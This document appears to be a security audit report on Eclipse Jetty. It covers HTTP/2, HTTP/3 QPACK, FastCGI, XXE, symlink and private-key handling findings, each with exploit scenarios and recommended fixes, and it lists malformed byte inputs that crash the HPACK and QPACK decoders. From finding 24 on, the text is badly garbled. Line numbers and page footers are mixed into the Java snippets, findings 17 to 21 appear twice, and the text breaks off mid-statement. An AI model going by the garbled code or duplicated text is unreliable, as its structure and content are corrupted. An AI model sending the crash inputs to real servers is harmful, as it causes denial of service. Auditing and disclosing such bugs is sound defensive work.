17. HttpStreamOverFCGI internally marks all requests as plaintext HTTP
Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-17
Target: org.eclipse.jetty.fcgi.server.internal.HttpStreamOverFCGI

Description
The HttpStreamOverFCGI class converts FastCGI messages into a format that can be processed by other system components that use the HttpStream interface. This class's onHeaders callback mistakenly marks each MetaData.Request object as a plaintext HTTP request, as the "TODO" comment shown in figure 17.1 indicates:

public void onHeaders()
{
    String pathQuery = URIUtil.addPathQuery(_path, _query);
    // TODO https?
    MetaData.Request request = new MetaData.Request(_method, HttpScheme.HTTP.asString(), hostPort, pathQuery, HttpVersion.fromString(_version), _headers, Long.MIN_VALUE);
    // ...[snip]...
}

Figure 17.1: HttpStreamOverFCGI.java, lines 108–119

In some configurations, other Jetty components could misinterpret a message received over FCGI as a plaintext HTTP message, which could cause a request to be incorrectly rejected, redirected in an infinite loop, or forwarded to another system over a plaintext HTTP channel instead of HTTPS.

Exploit Scenario
A Jetty instance runs an FCGI server and uses the HttpStream interface to process messages.
The MetaData.Request class's getURI method is used to check the incoming request's URI. This method mistakenly returns a plaintext HTTP URL due to the bug in HttpStreamOverFCGI.java. One of the following takes place during the processing of this request:
● An application-level security control checks the incoming request's URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application rejects the request and refuses to process it, causing a denial of service.
● An application-level security control checks the incoming request's URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application attempts to redirect the user to a suitable HTTPS URL. The check fails on this redirected request as well, causing an infinite redirect loop and a denial of service.
● An application processing FCGI messages acts as a proxy, forwarding certain requests to a third HTTP server. It uses MetaData.Request.getURI to check the request's original URI and mistakenly sends a request over plaintext HTTP.

Recommendations
Short term, correct the bug in HttpStreamOverFCGI.java to generate the correct URI for the incoming request.

Long term, consider streamlining the HTTP implementation to minimize the need for different classes to generate URIs from request data.

18. Excessively permissive and non-standards-compliant error handling in HTTP/2 implementation
Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-18
Target: The org.eclipse.jetty.http2.parser package

Description
Jetty's HTTP/2 implementation violates RFC 9113 in that it fails to terminate a connection with an appropriate error code when the remote peer sends a frame with one of the following protocol violations:
● A SETTINGS frame with the ACK flag set and a nonzero payload length
● A PUSH_PROMISE frame in a stream with push disabled
● A GOAWAY frame with its stream ID not set to zero

None of these situations creates an exploitable vulnerability. However, noncompliant protocol implementations can create compatibility problems and could cause vulnerabilities when deployed in combination with other misconfigured systems.

Exploit Scenario
A Jetty instance connects to an HTTP/2 server, or serves a connection from an HTTP/2 client, and the remote peer sends traffic that should cause Jetty to terminate the connection. Instead, Jetty keeps the connection alive, in violation of RFC 9113. If the remote peer is programmed to handle the noncompliant traffic differently than Jetty, further problems could result, as the two implementations interpret protocol messages differently.

Recommendations
Short term, update the HTTP/2 implementation to check for the following error conditions and terminate the connection with an error code that complies with RFC 9113 (see the sketch after this list):
● A peer receives a SETTINGS frame with the ACK flag set and a payload length greater than zero.
● A client receives a PUSH_PROMISE frame after having sent, and received an acknowledgement for, a SETTINGS frame with SETTINGS_ENABLE_PUSH equal to zero.
● A peer receives a GOAWAY frame with the stream identifier field not set to zero.

Long term, audit Jetty's implementation of HTTP/2 and other protocols to ensure that Jetty handles errors in a standards-compliant manner and terminates connections as required by the applicable specifications.
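The sketch below shows the shape of the first check; the identifiers (frameType, flags, terminateConnection, and the enum constants) are illustrative, not Jetty's actual API. RFC 9113, section 6.5, requires that a SETTINGS frame with the ACK flag set and a nonzero length be treated as a connection error of type FRAME_SIZE_ERROR:

// Sketch (identifiers are illustrative): a SETTINGS frame with ACK set
// must have an empty payload, per RFC 9113 section 6.5.
if (frameType == FrameType.SETTINGS && (flags & ACK_FLAG) != 0 && payloadLength != 0)
{
    // Terminate the connection with FRAME_SIZE_ERROR as the spec requires.
    terminateConnection(ErrorCode.FRAME_SIZE_ERROR);
    return;
}

The PUSH_PROMISE and GOAWAY checks would follow the same pattern, using PROTOCOL_ERROR as the error code per the corresponding sections of RFC 9113.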
19. XML external entities and entity expansion in Maven package metadata parser
Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-19
Target: org.eclipse.jetty.start.fileinits.MavenMetadata

Description
During module initialization, the MavenMetadata class parses maven-metadata.xml files when the module configuration includes a maven:// URI in its [files] section. The DocumentBuilderFactory class is used with its default settings, meaning that document type definitions (DTDs) are allowed and are applied. This behavior leaves the MavenMetadata class vulnerable to XML external entity (XXE) and XML entity expansion (XEE) attacks. These vulnerabilities could enable a variety of exploits, including server-side request forgery on the server's local network and arbitrary file reads from the server's filesystem.

Exploit Scenario
An attacker causes a Jetty installation to parse a maliciously crafted maven-metadata.xml file, such as by uploading a malicious package to a Maven repository, inducing an out-of-band download of the malicious package through social engineering, or placing the maven-metadata.xml file on the server's filesystem through other means. When the XML file is parsed, the XML-based attack is launched. The attacker could leverage this vector to do any of the following:
● Induce HTTP requests to servers on the server's local network
● Read and exfiltrate arbitrary files on the server's filesystem
● Consume excessive system resources with an XEE, causing a denial of service

Recommendations
Short term, disable parsing of DTDs in MavenMetadata so that maven-metadata.xml files cannot be used as a vector for XML-based attacks. Disabling DTDs may require knowledge of the underlying XML parser implementation returned by the DocumentBuilderFactory class.

Long term, review the default configurations and attributes supported by XML parsers that may be returned by the DocumentBuilderFactory to ensure that DTDs are properly disabled.
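One way to implement the short-term fix is sketched below. The feature URIs are those honored by Xerces, the parser behind the JDK's default DocumentBuilderFactory, which is the knowledge-of-implementation caveat noted above; setFeature throws ParserConfigurationException for unsupported features, which should be treated as a fatal configuration error rather than ignored:

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException
{
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    // Disallow DOCTYPE declarations outright; maven-metadata.xml needs none.
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    // Defense in depth for parsers that ignore the feature above.
    factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    factory.setXIncludeAware(false);
    factory.setExpandEntityReferences(false);
    factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
    factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
    return factory;
}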
20. Use of deprecated AccessController class
Severity: Informational Difficulty: N/A Type: Code Quality Finding ID: TOB-JETTY-20
Target:
● org.eclipse.jetty.logging.JettyLoggerConfiguration
● org.eclipse.jetty.util.MemoryUtils
● org.eclipse.jetty.util.TypeUtil
● org.eclipse.jetty.util.thread.PrivilegedThreadFactory
● org.eclipse.jetty.ee10.servlet.ServletContextHandler
● org.eclipse.jetty.ee9.nested.ContextHandler

Description
The classes listed in the "Target" cell above use the java.security.AccessController class, which is deprecated and slated to be removed in a future Java release. The java.security library documentation states that the AccessController class "is only useful in conjunction with the Security Manager," which is also deprecated. Thus, the use of AccessController no longer serves any beneficial purpose. The use of this deprecated class could impact Jetty's compatibility with future releases of the Java SDK.

Recommendations
Short term, remove all uses of the AccessController class.

Long term, audit the Jetty codebase for the use of classes in the java.security package that may not provide any value in Jetty 12, and remove all references to those classes.

21. QUIC server writes SSL private key to temporary plaintext file
Severity: High Difficulty: High Type: Cryptography Finding ID: TOB-JETTY-21
Target: org.eclipse.jetty.quic.server.QuicServerConnector

Description
Jetty's QUIC implementation uses quiche, a QUIC and HTTP/3 library maintained by Cloudflare. When the server's SSL certificate is handed off to quiche, the private key is extracted from the existing keystore and written to a temporary plaintext PEM file:

protected void doStart() throws Exception
{
    // ...[snip]...
    char[] keyStorePassword = sslContextFactory.getKeyStorePassword().toCharArray();
    String keyManagerPassword = sslContextFactory.getKeyManagerPassword();
    SSLKeyPair keyPair = new SSLKeyPair(
        sslContextFactory.getKeyStoreResource().getPath(),
        sslContextFactory.getKeyStoreType(),
        keyStorePassword,
        alias,
        keyManagerPassword == null ? keyStorePassword : keyManagerPassword.toCharArray()
    );
    File[] pemFiles = keyPair.export(new File(System.getProperty("java.io.tmpdir")));
    privateKeyFile = pemFiles[0];
    certificateChainFile = pemFiles[1];
}

Figure 21.1: QuicServerConnector.java, lines 154–179

Storing the private key in this manner exposes it to an increased risk of theft. Although the QuicServerConnector class deletes the private key file upon stopping the server, the deleted file may not be immediately removed from the physical storage medium, exposing it to potential theft by attackers who can access the raw bytes on the disk.

A review of quiche suggests that the library's API may not support reading a DES-encrypted keyfile. If that is true, then remediating this issue would require updates to the underlying quiche library.

Exploit Scenario
An attacker gains read access to a Jetty HTTP/3 server's temporary directory while the server is running. The attacker can retrieve the temporary keyfile and read the private key without needing to obtain or guess the encryption key for the original keystore. With this private key in hand, the attacker decrypts and tampers with all TLS communications that use the associated certificate.

Recommendations
Short term, investigate the quiche library's API to determine whether it can readily support password-encrypted private keyfiles. If so, update Jetty to save the private key in a temporary password-protected file and to forward that password to quiche. Alternatively, if password-encrypted private keyfiles cannot be supported, have Jetty pass the unencrypted private key directly to quiche as a function argument. Either option would obviate the need to store the key in a plaintext file on the server's filesystem. If quiche does not support either of these changes, open an issue or pull request for quiche to implement a fix for this issue.

22. Repeated code between HPACK and QPACK
Severity: Informational Difficulty: N/A Type: Code Quality Finding ID: TOB-JETTY-22
Target:
● org.eclipse.jetty.http2.hpack.internal.NBitInteger
● org.eclipse.jetty.http2.hpack.internal.Huffman
● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerParser
● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerEncoder
● org.eclipse.jetty.http3.qpack.internal.util.HuffmanDecoder
● org.eclipse.jetty.http3.qpack.internal.util.HuffmanEncoder

Description
Classes for dealing with n-bit integers and Huffman coding are implemented both in the jetty-http2-hpack and in jetty-http3-qpack libraries.
These classes have very similar functionality but are implemented in two different places, sometimes with identical code and other times with different implementations. In some cases (TOB-JETTY-9), one implementation has a bug that the other does not. The codebase would be easier to maintain and keep secure if the implementations were merged.

Exploit Scenario
A vulnerability is found in the Huffman encoding implementation, which has identical code in HPACK and QPACK. The vulnerability is fixed in one implementation but not the other, leaving one of the implementations vulnerable.

Recommendations
Short term, merge the two implementations of the n-bit integer and Huffman coding classes.

Long term, audit the Jetty codebase for other classes with very similar functionality.

23. Various exceptions in HpackDecoder.decode and QpackDecoder.decode
Severity: Informational Difficulty: N/A Type: Denial of Service Finding ID: TOB-JETTY-23
Target: org.eclipse.jetty.http2.hpack.HpackDecoder, org.eclipse.jetty.http3.qpack.QpackDecoder

Description
The HpackDecoder and QpackDecoder classes both throw unexpected Java-level exceptions:
● HpackDecoder.decode(0x03) throws BufferUnderflowException.
● HpackDecoder.decode(0x4800) throws NumberFormatException.
● HpackDecoder.decode(0x3fff 2e) throws IllegalArgumentException.
● HpackDecoder.decode(0x3fff 81ff ff2e) throws NullPointerException.
● HpackDecoder.decode(0xffff ffff f8ff ffff ffff ffff ffff ffff ffff ffff ffff ffff 0202 0000) throws ArrayIndexOutOfBoundsException.
● QpackDecoder.decode(..., 0x81, ...) throws IndexOutOfBoundsException.
● QpackDecoder.decode(..., 0xfff8 ffff f75b, ...) throws ArithmeticException.

For both HPACK and QPACK, these exceptions appear to be caught higher up in the call chain by catch (Throwable x) statements every time the decode functions are called. However, catching them within decode and throwing a Jetty-level exception from the catch statement would result in cleaner, more robust code.

Exploit Scenario
Jetty developers refactor the codebase, moving function calls around and introducing a new point in the code where HpackDecoder.decode is called. Assuming that decode will throw only org.jetty… errors, they forget to wrap this call in a catch (Throwable x) statement. This results in a DoS vulnerability.

Recommendations
Short term, document in the code that Java-level exceptions can be thrown.

Long term, modify the decode functions so that they throw only Jetty-level exceptions.
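A sketch of the long-term recommendation as it might look at the HPACK boundary. The decodeUnsafe name and the exact decode signature are illustrative, not Jetty's actual API; the exception constructor mirrors the one shown in figure 10.1:

public MetaData decode(ByteBuffer buffer) throws HpackException
{
    try
    {
        return decodeUnsafe(buffer); // hypothetical name for the existing decode body
    }
    catch (HpackException x)
    {
        throw x; // already a Jetty-level exception
    }
    catch (Throwable x)
    {
        // Normalize BufferUnderflowException, NullPointerException, etc.
        throw new HpackException.SessionException("Malformed HPACK block: %s", x);
    }
}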
if (_huffman) { buffer.put(( byte )( 0x28 | allowIntermediary)); NBitIntegerEncoder.encode(buffer, 3 , HuffmanEncoder.octetsNeeded(name)); 225 226 227 HuffmanEncoder.encode(buffer, name); buffer.put(( byte ) 0x80 ); NBitIntegerEncoder.encode(buffer, 7 , HuffmanEncoder.octetsNeeded(value)); 228 229 230 231 232 HuffmanEncoder.encode(buffer, value); } else { // TODO: What charset should we be using? (this applies to the instruction generators as well). 233 234 235 236 237 238 buffer.put(( byte )( 0x20 | allowIntermediary)); NBitIntegerEncoder.encode(buffer, 3 , name.length()); buffer.put(name.getBytes()); buffer.put(( byte ) 0x00 ); NBitIntegerEncoder.encode(buffer, 7 , value.length()); buffer.put(value.getBytes()); 75 OSTIF Eclipse: Jetty Security Assessment 239 240 } } Figure 24.1: EncodableEntry.java , lines 214–240 Note in particular lines 232–238, which are used to encode literal (non-Huffman-coded) names and values. The value returned by name.length() is added to the bytestring, followed by the value returned by name.getBytes() . Then, the value returned by value.length() is added to the bytestring, followed by the value returned by value.getBytes() . When this bytestring is decoded, the decoder will read the name length field and then read that many bytes as the name. If multibyte characters were used in the name field, the decoder will read too few bytes. The rest of the bytestring will also be decoded incorrectly, since the decoder will continue reading at the wrong point in the bytestring. The same issue occurs if multibyte characters were used in the value field. The same issue appears in EncodableEntry.ReferencedNameEntry.encode : if (_huffman) 164 // Encode the value. 165 String value = getValue(); 166 167 { 168 169 170 171 } 172 173 { 174 175 176 177 } else buffer.put(( byte ) 0x80 ); NBitIntegerEncoder.encode(buffer, 7 , HuffmanEncoder.octetsNeeded(value)); HuffmanEncoder.encode(buffer, value); buffer.put(( byte ) 0x00 ); NBitIntegerEncoder.encode(buffer, 7 , value.length()); buffer.put(value.getBytes()); Figure 24.2: EncodableEntry.java , lines 164–177 If value has multibyte characters, it will be incorrectly encoded in lines 174–176. Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. Exploit Scenario A Jetty server attempts to add the Set-Cookie header, setting a cookie value to a UTF-8-encoded string that contains multibyte characters. This causes an incorrect cookie value to be set and the rest of the headers in this message to be parsed incorrectly. 76 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, have the encode function in both EncodableEntry.LiteralEntry and EncodableEntry.ReferencedNameEntry encode the length of the string using string.getBytes() rather than string.length() . 77 OSTIF Eclipse: Jetty Security Assessment 25. No limits on maximum capacity in QPACK decoder Severity: High Difficulty: Medium Type: Denial of Service Finding ID: TOB-JETTY-25 Target: ● org.eclipse.jetty.http3.qpack.QpackDecoder ● org.eclipse.jetty.http3.qpack.internal.parser.DecoderInstructi onParser ● org.eclipse.jetty.http3.qpack.internal.table.DynamicTable Description In QPACK, an encoder can set the dynamic table capacity of the decoder using a “Set Dynamic Table Capacity” instruction. The HTTP/3 specification requires that the capacity be no larger than the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit chosen by the decoder. 
However, nowhere in the QPACK code is this limit checked for. This means that the encoder can choose whatever capacity it wants (up to Java’s maximum integer value), allowing it to take up large amounts of space on the decoder’s memory. Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. Exploit Scenario A Jetty server supporting QPACK is running. An attacker opens a connection to the server. He sends a “Set Dynamic Table Capacity” instruction, setting the dynamic table capacity to Java’s maximum integer value, 2 31-1 (2.1 GB). He then repeatedly enters very large values into the server’s dynamic table using an “Insert with Literal Name” instruction until the full 2.1 GB capacity is taken up. The attacker repeats this using multiple connections until the server runs out of memory and crashes. Recommendations Short term, enforce the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit on the capacity. Long term, audit Jetty’s implementation of QPACK and other protocols to ensure that Jetty enforces limits as required by the standards. 78 OSTIF Eclipse: Jetty Security Assessment +12. LiteralNameEntryInstruction incorrectly encodes value length Severity: Medium Difficulty: Medium Type: Denial of Service Finding ID: TOB-JETTY-12 Target: org.eclipse.jetty.http3.qpack.internal.instruction.LiteralNameEntryI nstruction Description QPACK instructions for inserting entries with literal names and non-Huffman-coded values will be encoded incorrectly when the value’s length is over 30, which could cause values to be sent incorrectly or errors to occur during decoding. The following snippet of the LiteralNameEntryInstruction.encode function is responsible for encoding the header value: if (_huffmanValue) byteBuffer.put(( byte )( 0x80 )); NBitIntegerEncoder.encode(byteBuffer, 7 , HuffmanEncoder.octetsNeeded(_value)); HuffmanEncoder.encode(byteBuffer, _value); 78 79 { 80 81 82 83 } 84 85 { 86 87 88 89 } else byteBuffer.put(( byte )( 0x00 )); NBitIntegerEncoder.encode(byteBuffer, 5 , _value.length()); byteBuffer.put(_value.getBytes()); Figure 12.1: LiteralNameEntryInstruction.java , lines 78–89 On line 87, 5 is the second parameter to NBitIntegerEncoder.encode , indicating that the number will take up 5 bits in the first encoded byte; however, the second parameter should be 7 instead. This means that when _value.length() is over 30, it will be incorrectly encoded. Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. 56 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, change the second parameter of the NBitIntegerEncoder.encode function from 5 to 7 in order to reflect that the number will take up 7 bits. Long term, write more tests to catch similar encoding/decoding problems. 57 OSTIF Eclipse: Jetty Security Assessment +13. FileInitializer does not check for symlinks Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-13 Target: org.eclipse.jetty.start.FileInitializer Description Module configuration files can direct Jetty to download a remote file and save it in the local filesystem while initializing the module. During this process, the FileInitializer class validates the destination path and throws an IOException exception if the destination is outside the ${jetty.base} directory. 
However, this validation routine does not check for symlinks: // now on copy/download paths (be safe above all else) if (destination != null && !destination.startsWith(_basehome.getBasePath())) throw new IOException( "For security reasons, Jetty start is unable to process file resource not in ${jetty.base} - " + location); Figure 13.1: FileInitializer.java , lines 112–114 None of the subclasses of FileInitializer check for symlinks either. Thus, if the ${jetty.base} directory contains a symlink, a file path in a module’s .ini file beginning with the symlink name will pass the validation check, and the file will be written to a subdirectory of the symlink’s destination. Exploit Scenario A system’s ${jetty.base} directory contains a symlink called dir , which points to /etc . The system administrator enables a Jetty module whose .ini file contains a [files] entry that downloads a remote file and writes it to the relative path dir/config.conf . The filesystem follows the symlink and writes a new configuration file to /etc/config.conf , which impacts the server’s system configuration. Additionally, since the FileInitializer class uses the REPLACE_EXISTING flag, this behavior overwrites an existing system configuration file. Recommendations Short term, rewrite all path checks in FileInitializer and its subclasses to include a call to the Path.toRealPath function, which, by default, will resolve symlinks and produce the real filesystem path pointed to by the Path object. If this real path is outside ${jetty.base} , the file write operation should fail. 58 OSTIF Eclipse: Jetty Security Assessment Long term, consolidate all filesystem operations involving the ${jetty.base} or ${jetty.home} directories into a single centralized class that automatically performs symlink resolution and rejects operations that attempt to read from or write to an unauthorized directory. This class should catch and handle the IOException exception that is thrown in the event of a link loop or a large number of nested symlinks. 59 OSTIF Eclipse: Jetty Security Assessment +14. FileInitializer permits downloading files via plaintext HTTP Severity: High Difficulty: High Type: Data Exposure Finding ID: TOB-JETTY-14 Target: org.eclipse.jetty.start.FileInitializer Description Module configuration files can direct Jetty to download a remote file and save it in the local filesystem while initializing the module. If the specified URL is a plaintext HTTP URL, Jetty does not raise an error or warn the user. Transmitting files over plaintext HTTP is intrinsically unsecure and exposes sensitive data to tampering and eavesdropping in transit. Exploit Scenario A system administrator enables a Jetty module that downloads a remote file over plaintext HTTP during initialization. An attacker with a network intermediary position sniffs the traffic and infers sensitive information about the design and configuration of the Jetty system under configuration. Alternatively, the attacker actively tampers with the file during transmission from the remote server to the Jetty installation, which enables the attacker to alter the module’s behavior and launch other attacks against the targeted system. Recommendations Short term, add a check to the FileInitializer class and its subclasses to prohibit downloads over plaintext HTTP. Additionally, add a validation check to the module .ini file parser to reject any configuration that includes a plaintext HTTP URL in the [files] section. 
Long term, consolidate all remote file downloads conducted during module configuration operations into a single centralized class that automatically rejects plaintext HTTP URLs. If current use cases require support of plaintext HTTP URLs, then at a minimum, have Jetty display a prominent warning message and prompt the user for manual confirmation before performing the unencrypted download. 60 OSTIF Eclipse: Jetty Security Assessment +15. NullPointerException thrown by FastCGI parser on invalid frame type Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-JETTY-15 Target: org.eclipse.jetty.fcgi.parser.Parser Description Because of a missing null check, the Jetty FastCGI client’s Parser class throws a NullPointerException exception when parsing a frame with an invalid frame type field. This exception occurs because the findContentParser function returns null when it does not have a ContentParser object matching the specified frame type, and the caller never checks the findContentParser return value for null before dereferencing it. case CONTENT: { ContentParser contentParser = findContentParser(headerParser.getFrameType()); if (headerParser.getContentLength() == 0 ) { padding = headerParser.getPaddingLength(); state = State.PADDING; if (contentParser.noContent()) return true ; } else { ContentParser.Result result = contentParser.parse(buffer); // ...[snip]... } break ; } Figure 15.1: Parser.java , lines 82–114 Exploit Scenario An attacker operates a malicious web server that supports FastCGI. A Jetty application communicates with this server by using Jetty’s built-in FastCGI client. The remote server transmits a frame with an invalid frame type, causing a NullPointerException exception and a crash in the Jetty application. Recommendations Short term, add a null check to the parse function to abort the parsing process before dereferencing a null return value from findContentParser . If a null value is detected, 61 OSTIF Eclipse: Jetty Security Assessment parse should throw an appropriate exception, such as IllegalStateException , that Jetty can catch and handle safely. Long term, build out a larger suite of test cases that ensures graceful handling of malformed traffic and data. 62 OSTIF Eclipse: Jetty Security Assessment +16. Documentation does not specify that request contents and other user data can be exposed in debug logs Severity: Medium Difficulty: High Type: Data Exposure Finding ID: TOB-JETTY-16 Target: Jetty 12 Operations Guide; numerous locations throughout the codebase Description Over 100 times, the system calls LOG.debug with a parameter of the format BufferUtil.toDetailString(buffer) , which outputs up to 56 bytes of the buffer into the log file. Jetty’s implementations of various protocols and encodings, including GZIP, WebSocket, multipart encoding, and HTTP/2, output user data received over the network to the debug log using this type of call. An example instance from Jetty’s WebSocket implementation appears in figure 16.1. public Frame.Parsed parse (ByteBuffer buffer) throws WebSocketException { try { // parse through while (buffer.hasRemaining()) { if (LOG.isDebugEnabled()) LOG.debug( "{} Parsing {}" , this , BufferUtil.toDetailString(buffer)); // ...[snip]... } // ...[snip]... } // ...[snip]... 
} Figure 16.1: Parser.java , lines 88–96 Although the Jetty 12 Operations Guide does state that Jetty debugging logs can quickly consume massive amounts of disk space, it does not advise system administrators that the logs can contain sensitive user data, such as personally identifiable information. Thus, the possibility of raw traffic being captured from debug logs is undocumented. Exploit Scenario A Jetty system administrator turns on debug logging in a production environment. During the normal course of operation, a user sends traffic containing sensitive information, such as personally identifiable information or financial data, and this data is recorded to the 63 OSTIF Eclipse: Jetty Security Assessment debug log. An attacker who gains access to this log can then read the user data, compromising data confidentiality and the user’s privacy rights. Recommendations Short term, update the Jetty Operations Guide to state that in addition to being extremely large, debug logs can contain sensitive user data and should be treated as sensitive. Long term, consider moving all debugging messages that contain buffer excerpts into a high-detail debug log that is enabled only for debug builds of the application. 64 OSTIF Eclipse: Jetty Security Assessment +17. HttpStreamOverFCGI internally marks all requests as plaintext HTTP Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-17 Target: org.eclipse.jetty.fcgi.server.internal.HttpStreamOverFCGI Description The HttpStreamOverFCGI class processes FastCGI messages in a format that can be processed by other system components that use the HttpStream interface. This class’s onHeaders callback mistakenly marks each MetaData.Request object as a plaintext HTTP request, as the “TODO” comment shown in figure 17.1 indicates: public void onHeaders () { String pathQuery = URIUtil.addPathQuery(_path, _query); // TODO https? MetaData.Request request = new MetaData.Request(_method, HttpScheme.HTTP.asString(), hostPort, pathQuery, HttpVersion.fromString(_version), _headers, Long.MIN_VALUE); // ...[snip]... } Figure 17.1: HttpStreamOverFCGI.java , lines 108–119 In some configurations, other Jetty components could misinterpret a message received over FCGI as a plaintext HTTP message, which could cause a request to be incorrectly rejected, redirected in an infinite loop, or forwarded to another system over a plaintext HTTP channel instead of HTTPS. Exploit Scenario A Jetty instance runs an FCGI server and uses the HttpStream interface to process messages. The MetaData.Request class’s getURI method is used to check the incoming request’s URI. This method mistakenly returns a plaintext HTTP URL due to the bug in HttpStreamOverFCGI.java . One of the following takes place during the processing of this request: ● ● An application-level security control checks the incoming request’s URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application rejects the request and refuses to process it, causing a denial of service. An application-level security control checks the incoming request’s URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application 65 OSTIF Eclipse: Jetty Security Assessment attempts to redirect the user to a suitable HTTPS URL. The check fails on this redirected request as well, causing an infinite redirect loop and a denial of service. ● An application processing FCGI messages acts as a proxy, forwarding certain requests to a third HTTP server. 
It uses MetaData.Request.getURI to check the request’s original URI and mistakenly sends a request over plaintext HTTP. Recommendations Short term, correct the bug in HttpStreamOverFCGI.java to generate the correct URI for the incoming request. Long term, consider streamlining the HTTP implementation to minimize the need for different classes to generate URIs from request data. 66 OSTIF Eclipse: Jetty Security Assessment +18. Excessively permissive and non-standards-compliant error handling in HTTP/2 implementation Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-18 Target: The org.eclipse.jetty.http2.parser and org.eclipse.jetty.http2.parser packages Description Jetty’s HTTP/2 implementation violates RFC 9113 in that it fails to terminate a connection with an appropriate error code when the remote peer sends a frame with one of the following protocol violations: ● ● ● A SETTINGS frame with the ACK flag set and a nonzero payload length A PUSH_PROMISE frame in a stream with push disabled A GOAWAY frame with its stream ID not set to zero None of these situations creates an exploitable vulnerability. However, noncompliant protocol implementations can create compatibility problems and could cause vulnerabilities when deployed in combination with other misconfigured systems. Exploit Scenario A Jetty instance connects to an HTTP/2 server, or serves a connection from an HTTP/2 client, and the remote peer sends traffic that should cause Jetty to terminate the connection. Instead, Jetty keeps the connection alive, in violation of RFC 9113. If the remote peer is programmed to handle the noncompliant traffic differently than Jetty, further problems could result, as the two implementations interpret protocol messages differently. Recommendations Short term, update the HTTP/2 implementation to check for the following error conditions and terminate the connection with an error code that complies with RFC 9113: ● ● A peer receives a SETTINGS frame with the ACK flag set and a payload length greater than zero. A client receives a PUSH_PROMISE frame after having sent, and received an acknowledgement for, a SETTINGS frame with SETTINGS_ENABLE_PUSH equal to zero. 67 OSTIF Eclipse: Jetty Security Assessment ● A peer receives a GOAWAY frame with the stream identifier field not set to zero. Long term, audit Jetty’s implementation of HTTP/2 and other protocols to ensure that Jetty handles errors in a standards-compliant manner and terminates connections as required by the applicable specifications. 68 OSTIF Eclipse: Jetty Security Assessment 19. XML external entities and entity expansion in Maven package metadata parser Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-19 Target: org.eclipse.jetty.start.fileinits.MavenMetadata Description During module initialization, the MavenMetadata class parses maven-metadata.xml files when the module configuration includes a maven:// URI in its [files] section. The DocumentBuilderFactory class is used with its default settings, meaning that document type definitions (DTD) are allowed and are applied. This behavior leaves the MavenMetadata class vulnerable to XML external entity (XXE) and XML entity expansion (XEE) attacks. These vulnerabilities could enable a variety of exploits, including server-side request forgery on the server’s local network and arbitrary file reads from the server’s filesystem. 
Exploit Scenario An attacker causes a Jetty installation to parse a maliciously crafted maven-metadata.xml file, such as by uploading a malicious package to a Maven repository, inducing an out-of-band download of the malicious package through social engineering, or by placing the maven-metadata.xml file on the server’s filesystem through other means. When the XML file is parsed, the XML-based attack is launched. The attacker could leverage this vector to do any of the following: ● ● ● Induce HTTP requests to servers on the server’s local network Read and exfiltrate arbitrary files on the server’s filesystem Consume excessive system resources with an XEE, causing a denial of service Recommendations Short term, disable parsing of DTDs in MavenMetadata so that maven-metadata.xml files cannot be used as a vector for XML-based attacks. Disabling DTDs may require knowledge of the underlying XML parser implementation returned by the DocumentBuilderFactory class. Long term, review default configurations and attributes supported by XML parsers that may be returned by the DocumentBuilderFactory to ensure that DTDs are properly disabled. 69 OSTIF Eclipse: Jetty Security Assessment 20. Use of deprecated AccessController class Severity: Informational Difficulty: N/A Type: Code Quality Finding ID: TOB-JETTY-20 Target: ● org.eclipse.jetty.logging.JettyLoggerConfiguration ● org.eclipse.jetty.util.MemoryUtils ● org.eclipse.jetty.util.TypeUtil ● org.eclipse.jetty.util.thread.PrivilegedThreadFactory ● org.eclipse.jetty.ee10.servlet.ServletContextHandler ● org.eclipse.jetty.ee9.nested.ContextHandler Description The classes listed in the “Target” cell above use the java.security.AccessController class, which is a deprecated class slated to be removed in a future Java release. The java.security library documentation states that the AccessController class “is only useful in conjunction with the Security Manager,” which is also deprecated. Thus, the use of AccessController no longer serves any beneficial purpose. The use of this deprecated class could impact Jetty’s compatibility with future releases of the Java SDK. Recommendations Short term, remove all uses of the AccessController class. Long term, audit the Jetty codebase for the use of classes in the java.security package that may not provide any value in Jetty 12, and remove all references to those classes. 70 OSTIF Eclipse: Jetty Security Assessment 21. QUIC server writes SSL private key to temporary plaintext file Severity: High Difficulty: High Type: Cryptography Finding ID: TOB-JETTY-21 Target: org.eclipse.jetty.quic.server.QuicServerConnector Description Jetty’s QUIC implementation uses quiche, a QUIC and HTTP/3 library maintained by Cloudflare. When the server’s SSL certificate is handed off to quiche, the private key is extracted from the existing keystore and written to a temporary plaintext PEM file: protected void doStart () throws Exception { // ...[snip]... char [] keyStorePassword = sslContextFactory.getKeyStorePassword().toCharArray(); String keyManagerPassword = sslContextFactory.getKeyManagerPassword(); SSLKeyPair keyPair = new SSLKeyPair( sslContextFactory.getKeyStoreResource().getPath(), sslContextFactory.getKeyStoreType(), keyStorePassword, alias, keyManagerPassword == null ? 
